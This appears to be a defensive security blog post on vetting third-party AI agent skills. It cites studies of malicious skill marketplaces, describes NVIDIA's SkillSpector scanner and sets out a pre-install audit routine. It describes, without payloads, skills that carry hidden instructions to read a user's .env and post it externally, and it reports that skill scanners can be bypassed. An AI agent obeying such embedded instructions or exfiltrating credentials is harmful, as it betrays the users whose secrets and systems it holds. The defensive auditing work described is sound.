How to Audit AI Agent Skills Before They Burn Your Stack

Every agent skill you install is third-party code that runs with your agent's full permissions. New research scanning tens of thousands of these packages found that roughly one in four carries a security flaw — and a measurable slice are built to steal. Before you add another skill to Claude Code, Codex, or Gemini CLI, you need a way to vet it.

That is the gap NVIDIA just moved to close. In late May 2026 it open-sourced SkillSpector, an Apache-2.0 scanner that vets agent skills for vulnerabilities and malicious patterns before they ever reach your stack (NVIDIA/SkillSpector). This is a practical guide to the threat, the tool, and a pre-deploy audit routine you can put in place this quarter.

Why skills are a supply-chain problem, not a convenience

An agent skill is a modular package of instructions plus executable code that extends what an agent can do. Because skills execute with implicit trust and minimal vetting, each one you install is effectively unreviewed third-party code running with your agent's permissions.

That design is the whole risk. As Snyk demonstrated, a malicious skill can reach shell access through nothing more than markdown instructions and a few lines of bundled script (Snyk: From SKILL.md to Shell Access). The skill model sits closer to a browser extension than a sandbox: it inherits your file access, your environment variables, and your API keys.

The attack is rarely loud. A skill might do exactly what its description promises — format a file, query an API, summarize a document — while a buried instruction also reads your .env and posts it to an external endpoint. Because the agent runs the skill with your standing credentials, there is no separate permission prompt and no obvious failure. The first sign of trouble is often a leaked key, not a crash. That asymmetry is what makes a pre-install review non-negotiable: the cost of catching a bad skill is one scan, while the cost of missing one is your secrets.

The first large-scale study of this ecosystem, "Agent Skills in the Wild," makes the scale concrete. Researchers collected 42,447 skills from two major marketplaces and analyzed 31,132 of them, finding that 26.1% contained at least one vulnerability — and that skills bundling executable scripts were 2.12x more likely to be vulnerable than instruction-only skills (arXiv 2601.10338). This is the same structural failure that hit early npm and PyPI: a fast-growing package ecosystem with no mandatory vetting. We have written before about how multi-agent trust boundaries shift the moment you delegate authority — installed skills are the same problem from the supply side.

What the data actually shows

Across independent studies, between a quarter and a third of agent skills carry security flaws, and a small but real fraction are outright malicious. Data exfiltration and privilege escalation are the most common patterns.

The numbers line up across separate research teams:

In the "Agent Skills in the Wild" dataset, data exfiltration appeared in 13.3% of skills and privilege escalation in 11.8%, while 5.2% showed high-severity patterns strongly suggesting malicious intent (arXiv 2601.10338).
A separate Snyk audit of 3,984 skills — the "ToxicSkills" study — found prompt injection in 36% of them and 1,467 malicious payloads, including trojans, cryptominers, and credential harvesters (Snyk: ToxicSkills).
A second academic analysis of those 3,984 skills confirmed 76 manually verified malicious payloads and found that 13.4% contained at least one critical-level issue, with several malicious skills still publicly downloadable at the time of writing (arXiv 2605.28588).

The "Agent Skills in the Wild" taxonomy, derived from 8,126 vulnerable skills, groups the threats into four buckets: prompt injection, data exfiltration, privilege escalation, and supply-chain risk (arXiv 2601.10338). Those are the categories any audit has to cover. The detection method behind those figures reached 86.7% precision and 82.5% recall, so the headline rates are conservative measurements rather than loose estimates — the real exposure is unlikely to be smaller (arXiv 2601.10338).

What NVIDIA SkillSpector actually checks

SkillSpector is an Apache-2.0 security scanner that vets agent skills using 64 vulnerability patterns across 16 categories, combining fast static analysis with an optional LLM semantic pass and returning a 0 to 100 risk score.

The tool runs a two-stage pipeline. Stage one is static analysis — pattern matching and abstract-syntax-tree inspection across 64 checks spanning prompt injection, data exfiltration, credential theft, privilege escalation, supply-chain risk, excessive agency, memory poisoning, tool misuse, and MCP tool poisoning. Stage two is an optional LLM semantic pass that catches logic that static rules miss (NVIDIA/SkillSpector).

It is built to drop into a real workflow: it accepts a Git repo, a URL, a zip file, a directory, or a single file, returns a 0 to 100 risk score with severity labels, and emits SARIF so results land in your existing security dashboards (OWASP Agentic Skills Top 10). The OWASP Agentic Skills project now lists it as a recommended scanner — useful external validation for a tool that is only weeks old. Each installed skill is third-party code running with your agent's permissions, so a pre-install gate is the single highest-leverage control you can add (AI Insiders).

A pre-deploy skill-audit playbook

To audit agent skills safely: scan every skill before install, fail your pipeline on high-risk scores, scope each skill's permissions to least privilege, and re-scan on every update.

Here is the routine we recommend for any team running coding agents in production:

Scan before install, not after. Point a scanner like SkillSpector at the skill's repo or file and read the risk score before it touches a developer machine. Treat unscanned skills the same way you treat unsigned binaries.
Make the scan a blocking CI gate. Wire the SARIF output into your pipeline and fail the build above a risk threshold you set. A scan that only runs manually gets skipped the day someone is in a hurry. This is the same discipline we apply with a security harness for AI code review.
Scope permissions to least privilege. A scanner tells you what a skill might do; permission rules decide what it can do. Recent agent releases let you constrain tools at invocation — for example, blocking a specific model or restricting which tools a skill may call — which pairs directly with pre-install scanning.
Re-scan on every version bump. A skill that was clean at v1.2 can ship a credential harvester at v1.3. Supply-chain attacks live in updates, so pin versions and re-audit each change rather than trusting a one-time green check.
Keep a reviewed allowlist. Maintain a short list of skills your team has audited and approved, and route anything new through the same gate. The principle mirrors how we treat first-party Claude skills — structure and review before scale.

The two highest-value steps are the cheapest. Scanning before install costs seconds per skill, and the study's clearest signal — that skills bundling executable scripts are 2.12x more likely to be vulnerable — gives you a simple triage rule: instruction-only skills are lower risk, anything shipping a script earns a closer look (arXiv 2601.10338). Most teams skip both because nothing has broken yet. The marketplaces that have been burned think differently, which is why pre-submission scanning is becoming table stakes rather than a nice-to-have.

This dovetails with the broader hardening already underway in agent runtimes. The same week SkillSpector landed, the wider toolchain was tightening invocation-level permissions and trust boundaries, a direction we covered in our look at running coding agents safely.

A green score is not immunity

No skill scanner is bulletproof. Security researchers have already shown that current agent-skill scanners can be bypassed, so a clean scan should lower risk, not end the conversation.

The Cloud Security Alliance published a research note showing that several commercial and open-source skill scanners can be bypassed across the board (CSA research note). Marketplaces are layering defenses in response — ClawHub now runs automated scanning on every submission, and Cisco's AI Defense ships an open-source YAML and YARA skill scanner — but layered detection is not the same as immunity.

The practical takeaway is defense in depth. Use a scanner to filter the obvious threats, scope permissions so a missed one can do limited damage, monitor what your agents actually access at runtime, and keep a human in the loop for anything touching credentials or production data. A scanner is the first gate, not the last word. For protocol-level exposure, our breakdown of the MCP v2 protocol shift covers where the standards are heading.

FAQ

What is an AI agent skill, and why is it a security risk? An agent skill is a modular package of instructions and executable code that extends an agent's capabilities. It is a security risk because skills execute with implicit trust and the agent's full permissions, so a malicious one can read files, steal credentials, or exfiltrate data (arXiv 2601.10338).

How many agent skills are actually vulnerable? In the largest study to date, 26.1% of analyzed skills contained at least one vulnerability and 5.2% showed likely malicious intent (arXiv 2601.10338). A separate Snyk audit found prompt injection in 36% of 3,984 skills and 1,467 malicious payloads (Snyk: ToxicSkills).

What does NVIDIA SkillSpector do? SkillSpector is an open-source, Apache-2.0 scanner that checks agent skills against 64 vulnerability patterns across 16 categories, using static analysis plus an optional LLM semantic pass, and returns a 0 to 100 risk score with SARIF output for CI (NVIDIA/SkillSpector).

Is a clean scan enough to trust a skill? No. Researchers have shown current skill scanners can be bypassed, so a clean score should be combined with least-privilege permissions, runtime monitoring, and human review of anything sensitive (CSA research note).

Conclusion

Agent skills gave teams a fast way to extend what their agents can do — and a fast way to invite unreviewed code into production. The research is unambiguous: a quarter of skills carry flaws, and a small fraction are weaponized. A free, open-source scanner like SkillSpector, wired into a blocking pre-install gate and paired with least-privilege scoping, turns that risk from invisible to managed. If you want help building a skill-audit gate into your agent pipeline, talk to Context Studios — securing agent stacks is what we do.

Sources

Agent Skills in the Wild: An Empirical Study of Security Vulnerabilities at Scale — https://arxiv.org/abs/2601.10338
Snyk, ToxicSkills study — https://snyk.io/blog/toxicskills-malicious-ai-agent-skills-clawhub
NVIDIA/SkillSpector (GitHub) — https://github.com/NVIDIA/SkillSpector
OWASP Agentic Skills Top 10, Skill Scanner Integration — https://owasp.org/www-project-agentic-skills-top-10/skill-scanner-integration
Cloud Security Alliance, AI Agent Skill Scanner Bypass research note — https://labs.cloudsecurityalliance.org/research/csa-research-note-ai-agent-skill-scanner-bypass-20260610-csa
Snyk, From SKILL.md to Shell Access in Three Lines of Markdown — https://snyk.io/articles/skill-md-shell-access
Exploring the Emerging Threats of the Agent Skill Ecosystem — https://arxiv.org/html/2605.28588v1
AI Insiders, NVIDIA ships open-source scanner for agent skill supply-chain risk — https://aiinsiders.net/article/nvidia-ships-open-source-scanner-for-agent-skill-supply

How to Audit AI Agent Skills Before They Burn Your Stack

Why skills are a supply-chain problem, not a convenience

What the data actually shows

What NVIDIA SkillSpector actually checks

A pre-deploy skill-audit playbook

A green score is not immunity

FAQ

Conclusion

Sources

Share article

Read more

Context Engineering: Wie man zuverlässige LLM-Systeme durch Context-Design baut

AI Agent SDK Landscape Dezember 2025: Der ultimative Vergleich

Die große Konvergenz: Wie der Dezember 2025 die AI-Agent-Landschaft veränderte